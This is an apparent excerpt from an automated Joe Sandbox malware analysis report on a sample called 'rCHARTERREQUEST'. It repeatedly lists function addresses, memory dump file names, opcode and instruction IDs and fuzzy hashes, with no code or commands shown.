                                                                                                          • Snapshot File: hcaresult_0_2_6d40000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 8f47382e5456a65d24c49ae420bb95a6d77345dc145c8d6109545b3972d9b385
                                                                                                          • Instruction ID: 3a154fc958bfd7e4a8deb1854c57a1c96ebb5121cff2d23fda2b230cb3d77c0d
                                                                                                          • Opcode Fuzzy Hash: 8f47382e5456a65d24c49ae420bb95a6d77345dc145c8d6109545b3972d9b385
                                                                                                          • Instruction Fuzzy Hash: F2E0C274E05208EFCB84EFA8D5416ACBBF5EB48200F10C1AA9818A3341D631AE02DB80
                                                                                                          Function 06C6F620 Relevance: .0, Instructions: 22COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933607000.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c60000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6065815722dcb7ead9492debb6a9855bd05b8b475384b6416401aa6a5e2632a3
                                                                                                          • Instruction ID: c36e4d54307eee3e589dd506e8f505a1b26f02a56e797b416b77b289d96b444d
                                                                                                          • Opcode Fuzzy Hash: 6065815722dcb7ead9492debb6a9855bd05b8b475384b6416401aa6a5e2632a3
                                                                                                          • Instruction Fuzzy Hash: FAE0ED74E05208EFC784DFA9D5406ACBBF5EB48300F10C0AD9858D3351D6319A02DF44
                                                                                                          Function 06B87490 Relevance: .0, Instructions: 21COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933005482.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6b80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: ee373280970aa52ace3721c3c3a61f8177b0808f2c80d58d3b811e96064848ca
                                                                                                          • Instruction ID: f4d7ef729c49bc8c740c41d9b01fd26959b0595866902eda857b666ada37463f
                                                                                                          • Opcode Fuzzy Hash: ee373280970aa52ace3721c3c3a61f8177b0808f2c80d58d3b811e96064848ca
                                                                                                          • Instruction Fuzzy Hash: ABF01C709041599FDB40CB24C984FA9BBB5FB45304F1085E1D84CA7249C7349E86CF50
                                                                                                          Function 06B88B38 Relevance: .0, Instructions: 21COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933005482.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6b80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: de37cfdb8f0a352ba6a07c636e0d2f1b4f71f47ec7ad3ccb73461beee635b799
                                                                                                          • Instruction ID: 7bd8c8ec66ca4cf92962a640fa96c98a12032b2c187599e92f77bbfa2dce7769
                                                                                                          • Opcode Fuzzy Hash: de37cfdb8f0a352ba6a07c636e0d2f1b4f71f47ec7ad3ccb73461beee635b799
                                                                                                          • Instruction Fuzzy Hash: C9E04FB4909108AFC744DF94D5409ADBBB8AB89311F1090E9E94857341CA329A42EB94
                                                                                                          Function 06C61FB8 Relevance: .0, Instructions: 21COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933607000.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c60000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: d123fc361f0a434e57908e723bb5456c19323354f2187dbfd6efa3b421d73a99
                                                                                                          • Instruction ID: 890820d12a25d80816a07f9c66ff4bbef1214263f1dacddab59ffd6dffa93790
                                                                                                          • Opcode Fuzzy Hash: d123fc361f0a434e57908e723bb5456c19323354f2187dbfd6efa3b421d73a99
                                                                                                          • Instruction Fuzzy Hash: F4E04F74909108ABC744DFA9D5409BDBBB8AB49311F149099A84467341CA319A52DB95
                                                                                                          Function 06C62F58 Relevance: .0, Instructions: 21COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933607000.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c60000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 8e4c096ca8c1b4ad82cf93fcd463eb55e33557c55a55ef3684a9b4759fb9cac4
                                                                                                          • Instruction ID: 2f467f5cc584408c4fb70d36ce407d338357fee83f63cd9fa1e567c584aabc6e
                                                                                                          • Opcode Fuzzy Hash: 8e4c096ca8c1b4ad82cf93fcd463eb55e33557c55a55ef3684a9b4759fb9cac4
                                                                                                          • Instruction Fuzzy Hash: DEF0B2B4D19268CFEFA0DF25D988B9DB6F5BB04304F0046E9E90DA2245C7345E80CF09
                                                                                                          Function 06B82E68 Relevance: .0, Instructions: 20COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933005482.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6b80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 000f5c4f99799cbfa1946c34d58a406ee70ae18676d6d4b04cb4abeefb4e77d6
                                                                                                          • Instruction ID: 60d8417e3ea435b2cc532f32ac723316b26987b11480838d9f600975975d79b0
                                                                                                          • Opcode Fuzzy Hash: 000f5c4f99799cbfa1946c34d58a406ee70ae18676d6d4b04cb4abeefb4e77d6
                                                                                                          • Instruction Fuzzy Hash: D8E04F74905108EFC744DFA4D5409ADBBB4EB49311F1091999C4427341CA325F52DB84
                                                                                                          Function 06B82C10 Relevance: .0, Instructions: 20COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933005482.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6b80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: cd00c94bae101bbfd563539e06e4a46f6c9ce8185db5d9013a2b03754b0a17b2
                                                                                                          • Instruction ID: 5115ba77301fb474c3354205532078956402da0aeaa7f3b3227856030358afbe
                                                                                                          • Opcode Fuzzy Hash: cd00c94bae101bbfd563539e06e4a46f6c9ce8185db5d9013a2b03754b0a17b2
                                                                                                          • Instruction Fuzzy Hash: 11E09A74D05108EFC744EF98D5416ACBBB4EB48314F1095E9981857341DA71AE46DF85
                                                                                                          Function 06B82830 Relevance: .0, Instructions: 20COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933005482.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6b80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 000f5c4f99799cbfa1946c34d58a406ee70ae18676d6d4b04cb4abeefb4e77d6
                                                                                                          • Instruction ID: f7f0205a6db328730f7c09016732cdc6c5cd4dbc47346a352962878f00576399
                                                                                                          • Opcode Fuzzy Hash: 000f5c4f99799cbfa1946c34d58a406ee70ae18676d6d4b04cb4abeefb4e77d6
                                                                                                          • Instruction Fuzzy Hash: 90E0BF74905108EFCB44DF94D5419ADBBB5EB49310F1091E99C0427351C6315E56DB95
                                                                                                          Function 07058F10 Relevance: .0, Instructions: 20COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1935005830.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7040000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 7c67c89b4f492a73b016233b9753921b2e2be345f1adc5f6df6369f0c0b0729e
                                                                                                          • Instruction ID: b4521374a81cb110d89062378faaaed3e94f66a2125041691424fb777242a774
                                                                                                          • Opcode Fuzzy Hash: 7c67c89b4f492a73b016233b9753921b2e2be345f1adc5f6df6369f0c0b0729e
                                                                                                          • Instruction Fuzzy Hash: 9EE01AB4D05108EBC744DF98D5405ACBBF5AB49200F10C1E99C1957381D6315A02DB40
                                                                                                          Function 0705FF90 Relevance: .0, Instructions: 20COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1935005830.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7040000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 41b51b83b08d3808c3fe0b416f5cf53d3c9bdb8b57eb4a81d8e54b03a372ae99
                                                                                                          • Instruction ID: 8755e89a3ab269da11416494c4819584467c03e23c320aafcf39640d4bce9133
                                                                                                          • Opcode Fuzzy Hash: 41b51b83b08d3808c3fe0b416f5cf53d3c9bdb8b57eb4a81d8e54b03a372ae99
                                                                                                          • Instruction Fuzzy Hash: 6CE012B4E05209EBCB44DF98D5406ACBBF4EB89300F2081A9AC18A7345CA31AE06DB80
                                                                                                          Function 06D39468 Relevance: .0, Instructions: 20COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934546099.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d30000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a4e3c66e03a67facdc46866d5ac3a4f3afa8e81481cb7d010d70b19e52760997
                                                                                                          • Instruction ID: e6679565eca8cd1de23bfc655610a4a72097442674dece8c2565ec7925a62b27
                                                                                                          • Opcode Fuzzy Hash: a4e3c66e03a67facdc46866d5ac3a4f3afa8e81481cb7d010d70b19e52760997
                                                                                                          • Instruction Fuzzy Hash: CDE04670A09218EFC784DFE8D5506ACBBF4AB4C204F2080A9D80897341EA72AE42CB80
                                                                                                          Function 06D38ED3 Relevance: .0, Instructions: 20COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934546099.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d30000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 8e73de50dac37f8be1892866593dc003ad9ae43173ea91e9f43bbf4da293b5c1
                                                                                                          • Instruction ID: 24c0cedd2d79ef8aac792a4d6324f028fcf05390dc7ca1abadf18d30f403e626
                                                                                                          • Opcode Fuzzy Hash: 8e73de50dac37f8be1892866593dc003ad9ae43173ea91e9f43bbf4da293b5c1
                                                                                                          • Instruction Fuzzy Hash: F6F01C78A4421ACFD764DF29D884BAEBBB2FB85304F1080A5E419B7740DB388E85DF00
                                                                                                          Function 06D34948 Relevance: .0, Instructions: 20COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934546099.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d30000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: ab78272d38acf73e51fb524f880939ab148a353fc9f7cc5c6ef927e01bfd6727
                                                                                                          • Instruction ID: c0d4c09ba2f69285a9e96dc971697cc980bd3558721d49f7c295500f60f9f4c5
                                                                                                          • Opcode Fuzzy Hash: ab78272d38acf73e51fb524f880939ab148a353fc9f7cc5c6ef927e01bfd6727
                                                                                                          • Instruction Fuzzy Hash: 77E01A34D05108EFC784DF98D5406ACBBF4EB88320F1080ADD80867341CA35AE02DB80
                                                                                                          Function 06D4D450 Relevance: .0, Instructions: 20COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934615546.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d40000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 0eea0863c949cc32ccb0d836a73eea561e1380978cb2444a1aaea9c39e05d738
                                                                                                          • Instruction ID: 5acf237dd8b14c34b708d786e36bbf964644ff83276187ac0fade9ef185129ff
                                                                                                          • Opcode Fuzzy Hash: 0eea0863c949cc32ccb0d836a73eea561e1380978cb2444a1aaea9c39e05d738
                                                                                                          • Instruction Fuzzy Hash: 0CE01A34D05108AFC744DF98D5415ACBBB5AB48200F1480E9985957341C635AE06DB80
                                                                                                          Function 06D410BA Relevance: .0, Instructions: 20COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934615546.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d40000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 2add321f795cf64fe6d7cc9141e63c60690fc5a8ba5d3e5b2fc2a0ca075f4417
                                                                                                          • Instruction ID: 613489fd7e06a9650f2d986bc047e104a6ab8d8510e1ba47379974054cbad894
                                                                                                          • Opcode Fuzzy Hash: 2add321f795cf64fe6d7cc9141e63c60690fc5a8ba5d3e5b2fc2a0ca075f4417
                                                                                                          • Instruction Fuzzy Hash: 7BD05B301163847FC701A265AD168D17F6D594710975941C9B4495B44387079853C3F2
                                                                                                          Function 0180D6D8 Relevance: .0, Instructions: 20COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1917776226.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_1800000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 0a636a1022c0911e1c6877aca11e5ba2f9b813bd9cc333613ff6133d467b5d73
                                                                                                          • Instruction ID: 97f9608352089ba9f1d1df015bb9bf60aa2280c000c2be20b393ca4751a04214
                                                                                                          • Opcode Fuzzy Hash: 0a636a1022c0911e1c6877aca11e5ba2f9b813bd9cc333613ff6133d467b5d73
                                                                                                          • Instruction Fuzzy Hash: 84E01A34D0510CEBC754DFD8D9415ACBBB4EB48304F1081A9981897341CA316E42DF85
                                                                                                          Function 0705E458 Relevance: .0, Instructions: 19COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1935005830.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7040000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b868f2726addb847e60f69816b2ffab8fbda199eda6842b198f195b03acdc991
                                                                                                          • Instruction ID: b98e8a3d3f9756fa6aa5e0395011bbc0400a48afd9e0acb3a81c17fd8479f52c
                                                                                                          • Opcode Fuzzy Hash: b868f2726addb847e60f69816b2ffab8fbda199eda6842b198f195b03acdc991
                                                                                                          • Instruction Fuzzy Hash: 99E0ECB4909108EBC744DFA4E5415ADBBB8EB49314F2091999C882B351CB716E46DB85
                                                                                                          Function 0705B878 Relevance: .0, Instructions: 19COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1935005830.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7040000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 2f4112105f5ef13c2e7486a0257634977ec302f7991ea0ba9446a4fc6d132911
                                                                                                          • Instruction ID: 615ad1dcdf4f7215b77be9e4536828ee7595bfe8c783e2de0fde1e7a4a46ba56
                                                                                                          • Opcode Fuzzy Hash: 2f4112105f5ef13c2e7486a0257634977ec302f7991ea0ba9446a4fc6d132911
                                                                                                          • Instruction Fuzzy Hash: 39E012B154210D9BC791FFF8D9006AE77E9DB09200F1059E5D815A7150ED325A449796
                                                                                                          Function 06D34C48 Relevance: .0, Instructions: 19COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934546099.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d30000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c8d71358516fea0f9255d9afee913929a85e9c9d4eea68511436bdbbd5498f76
                                                                                                          • Instruction ID: 487cf2fd9f01641016e4b6a68e7da74e71da7dc52ff9994ec24a9a87dd508b98
                                                                                                          • Opcode Fuzzy Hash: c8d71358516fea0f9255d9afee913929a85e9c9d4eea68511436bdbbd5498f76
                                                                                                          • Instruction Fuzzy Hash: 85E0127194220D9BC781EFF9D90069E77E9DB09200F1054E5951597150ED365A04A796
                                                                                                          Function 06D4DA18 Relevance: .0, Instructions: 19COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934615546.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d40000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 8674de3cec31de0f651ce031daca2bb24bf09737e3fb77a7c415dee5269eca8c
                                                                                                          • Instruction ID: 0dc4349727e5f20966a3f5d9b8f02be3c88c8d06e9b5d60f48c68a87ab379abb
                                                                                                          • Opcode Fuzzy Hash: 8674de3cec31de0f651ce031daca2bb24bf09737e3fb77a7c415dee5269eca8c
                                                                                                          • Instruction Fuzzy Hash: DEE0C27184610C9BC780EFF9C90069E77E9DF08200F1004E59405A3110EE325E009796
                                                                                                          Function 06D4F1B8 Relevance: .0, Instructions: 19COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934615546.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d40000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e585fe7438f7c7591f93a1be5334884d73ffb9bac86e0f1f0d72b68abca5498b
                                                                                                          • Instruction ID: d0dce8eb099e6546b07335a5eae3dbe21621a0f56770fb8d702e01e92c0f9c28
                                                                                                          • Opcode Fuzzy Hash: e585fe7438f7c7591f93a1be5334884d73ffb9bac86e0f1f0d72b68abca5498b
                                                                                                          • Instruction Fuzzy Hash: 2FE01274D0920CDBC744EF94E9415ACBBB9EB89314F2091DDDC0927351CA31AE56DB85
                                                                                                          Function 0180F6B8 Relevance: .0, Instructions: 19COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1917776226.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_1800000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 0c224bd6c8732e62ae4f02c3340c745aded8348f4e938e87d20a896cdebf30f8
                                                                                                          • Instruction ID: ff580c549a04d4092c29a42aa5d3fd19573327562b049082493026da36a1ed9a
                                                                                                          • Opcode Fuzzy Hash: 0c224bd6c8732e62ae4f02c3340c745aded8348f4e938e87d20a896cdebf30f8
                                                                                                          • Instruction Fuzzy Hash: A0E08C3490910CDBC754DFA8E9405ACBBB8AB49314F20D098980867391CA316E02DB80
                                                                                                          Function 01807640 Relevance: .0, Instructions: 19COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1917776226.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_1800000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: f0de8f59069c001a672f6c55a54f3d6550e34d3a46afcc833592faf4a6ab9ff3
                                                                                                          • Instruction ID: 1b483ead9d2216cc797892f3f00ca036ff0b334d985a6a3bf6846039d306aaff
                                                                                                          • Opcode Fuzzy Hash: f0de8f59069c001a672f6c55a54f3d6550e34d3a46afcc833592faf4a6ab9ff3
                                                                                                          • Instruction Fuzzy Hash: 32E0C23180120CDFCB40EFF8D90469E7BF8EB09301F0054A5D505A7150EE325B05ABA6
                                                                                                          Function 06C6E868 Relevance: .0, Instructions: 19COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933607000.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c60000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 8b8bbabd827c97445fe17e201c1fe678aecd3c7bf423412ad7f5d61e17dc1faa
                                                                                                          • Instruction ID: 7b11bb671deb6778fe4329fa57ed7ad1298eb8a75b1d0ce2d98e738d3d4199ff
                                                                                                          • Opcode Fuzzy Hash: 8b8bbabd827c97445fe17e201c1fe678aecd3c7bf423412ad7f5d61e17dc1faa
                                                                                                          • Instruction Fuzzy Hash: A3E0ECB4D1A20CDFC784EFA9D5856ADBBF8AB4C201F1050AAEC09A3391EA305A54DB45
                                                                                                          Function 06D38721 Relevance: .0, Instructions: 18COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934546099.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d30000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 4432d616434d52a854574bca5c46c3727c05d9bec865e5d189d56b8b53ba6843
                                                                                                          • Instruction ID: ea6555df9f7667ac139a8676270c5a149055787a62810e7528285055d7e28631
                                                                                                          • Opcode Fuzzy Hash: 4432d616434d52a854574bca5c46c3727c05d9bec865e5d189d56b8b53ba6843
                                                                                                          • Instruction Fuzzy Hash: 4FE0E5B4E40218DFDB54DF58F08479CBBB2FB85309F504015F512A7690CB395889DB01
                                                                                                          Function 06D3B578 Relevance: .0, Instructions: 18COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934546099.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d30000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 8ffe96c0e463fee36b56c1017727dd065ab874167f4b6991da3b2f31c5967076
                                                                                                          • Instruction ID: 1194d8ee3eeef6104586b20dcb063f2863ef50c2adcfd74f4480dcf66d79119c
                                                                                                          • Opcode Fuzzy Hash: 8ffe96c0e463fee36b56c1017727dd065ab874167f4b6991da3b2f31c5967076
                                                                                                          • Instruction Fuzzy Hash: 63E01234A01208EFCB00DFBADE4176DB7B6EB85214F1085A9E90597340DA315F109B91
                                                                                                          Function 06D38BC9 Relevance: .0, Instructions: 18COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934546099.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d30000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 78e31e88e1a19dce36dea0c10ceb079914c85f926c55e19ac1bcfeec87eba6a6
                                                                                                          • Instruction ID: 483903ae71860845ece345907e515205ade122fc09d1dbe6b186f9f6c5658a89
                                                                                                          • Opcode Fuzzy Hash: 78e31e88e1a19dce36dea0c10ceb079914c85f926c55e19ac1bcfeec87eba6a6
                                                                                                          • Instruction Fuzzy Hash: A3E0EDB4A04218DFD794DF58E4887A87BB2FB85319F604064F049A7680CB3958C9DB01
                                                                                                          Function 06D3946C Relevance: .0, Instructions: 17COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934546099.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d30000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 66ecb21581e51d6f00375a30c8f380c5b6ea60aa4a402d3464fd665c3bba5d87
                                                                                                          • Instruction ID: 3fbd081e953579a59b5da1faabe2a5b301e25601c5c983d17b3e50da0567f35a
                                                                                                          • Opcode Fuzzy Hash: 66ecb21581e51d6f00375a30c8f380c5b6ea60aa4a402d3464fd665c3bba5d87
                                                                                                          • Instruction Fuzzy Hash: C6E08C306091548FC7A4CBACD0506A8BBF09B4E224F2442C9D8689F282D6725A42C781
                                                                                                          Function 06D3B128 Relevance: .0, Instructions: 17COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934546099.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d30000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
